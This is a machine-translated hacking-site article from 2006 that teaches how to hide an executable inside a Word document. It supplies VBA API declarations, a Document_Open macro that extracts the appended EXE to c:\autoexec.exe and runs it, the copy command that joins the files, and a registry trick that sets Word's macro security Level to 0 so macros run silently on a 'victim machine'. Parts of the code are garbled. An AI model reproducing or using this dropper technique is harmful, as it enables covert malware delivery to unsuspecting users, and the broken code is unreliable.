EXE file into DOC File format method-vulnerability warning-the black bar safety net

ID MYHACK58:6220069775
Type myhack58
Reporter 佚名
Modified 2006-06-14T00:00:00


This conversion is not is the file format changes,just put an EXE file connected in a DOC file at the end of it,this DOC file is of course not a different WORD document., the document contains a macro statement,can be in when running the connector in its own file at the end of the EXE file data read out and run,causing an illusion,as if the document is open when you run the EXE file. (And file bundle , the principle is very like!)

Familiar with VB friends all know,WORD macros is to use VBA to write the specific syntax and VB is the same,but some methods VB does not,such as the macro virus is to use a macro to copy the statement to achieve the infection of the object. And VB,we can write a macro to call the WINDOWS API!! Here we introduce we write this macro need to use the API function:

1)CreateFile is used to open the file,the function of the VB statements are as follows: Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDistribution As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplate As Long) As Long

2)the CloseHandle is used to close is to open the file handle,the function of the VB statements are as follows: Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

3)ReadFile for From is to open the file to read data,the function of the VB statements are as follows:

Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long

4)WriteFile is used to read out the data written to the file,the function of the VB statements are as follows:

Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long

5)SetFilePoniter move the file pointer,the function VB in the following statement:

Declare Function SetFilePointer Lib "kernel32" (ByVal hFile As Long, ByVal lDistanceToMove As Long, ByVal lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long

6)The following is a function of the parameter statement

Public Const GENERIC_READ As Long = &H80000000

Public Const GENERIC_WRITE As Long = &H40000000

Public Const FILE_SHARE_READ As Long = 1

Public Const FILE_SHARE_WRITE As Long = 2

Public Const CREATE_NEW As Long = 1

Public Const CREATE_ALWAYS As Long = 2

Public Const OPEN_EXISTING As Long = 3

Public Const OPEN_ALWAYS As Long = 4

Public Const TRUNCATE_EXISTING As Long = 5

Public Const INVALID_HANDLE_VALUE As Long = -1

Public Const FILE_ATTRIBUTE_NORMAL As Long = &H80

Well,with that preparation work can start,we are running WORD 2000,open the VISUAL BASIC Editor,create a new module,put the above function and parameter declarations a copy of it! Then back to the“ThisDocument”Code view, select the Document Open event, the input bit code:

Private Sub Document_Open()

Dim buffer(6 5 5 3 6) As Byte

Dim h, h2, j, i, k As Long

h = CreateFile(ThisDocument. Path & "/" & amp; ThisDocument. Name, GENERIC_READ, FILE_SHARE_READ + FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0)

‘To SHARE_READ way to open its own DOC file

h2 = CreateFile("c:\autoexec.exe", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0)

‘Create a new EXE file is ready to store read out data.


Exit Sub

End If

k = SetFilePointer(h, 3 2 7 6 8, nil, 0)

‘The file pointer is moved to the DOC file with the EXE file of the junction.


i = ReadFile(h, buffer(0), 6 5 5 3 6, j, 0)

i = WriteFile(h2, buffer(0), j, j, 0)

Loop Until j < 6 5 5 3 6

CloseHandle (h)

CloseHandle (h2)

Shell "c:\autoexec.exe"

‘Run the EXE file

End Sub

Such a macro just write well,pay attention to where is above the SetFilePointer function of the use of Section:3 2 7 6 8 are you prepared to finish the macro save the DOC file size,not the top is 3 2 7 6 8 Oh,everyone take note!

You may have questions,How to turn EXE files to DOC files back? Very simple,put you have to pick the EXE into the and this DOC file in the same directory. Run DOC command:

copy /b xxxx.doc + xxxxx.exe newdoc.doc

So that you can.~~~. When you open this NEWDOC. DOC,the macro will put back the EXE file is read out and stored in the C:\AUTOEXEC. EXE,and then run,is not a terrorist! However this requires you to Word 2000 security degree is the minimum time to achieve,about this security problem,we also found the Microsoft Small BUG,we look at the registry in this key:

HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security in the

The Level value. When the security degree is 3(High), WORD will not run any macro,2(in)when WORD asks you whether to run the macro,1(Low)when a WORD will automatically run all macros! But it is easy to be found security is set to low,smart you must think of if this value becomes 0 when?!!?? Oh! If set to 0,the WORD inside it will show the degree of safety is high,but it can automatically run any macro!! Isn't it an exaggeration?? And registry editor, in the back door like this is all MS's Backdoor?

If you are the victim machine to accept your DOC files but also to run smoothly,the most important is to put the WORD security in the registry value to 0,how to change?? Way too much bar,single be IE malicious code can achieve are too much,in addition,if the web page connected on the DOC,IE will automatically download the DOC file! Risk of MS!!!

This calculation does not count the vulnerability I dare say,but prevention is really hard,unless you're always monitoring the registry,or without a WORD? Too negative the bar,the most important is the careful prevention,stranger things do not collect! Includes a non-EXE file,we have now found a DOC file can hide EXE file, also someone will find the other files can be hidden EXE,so everyone be careful.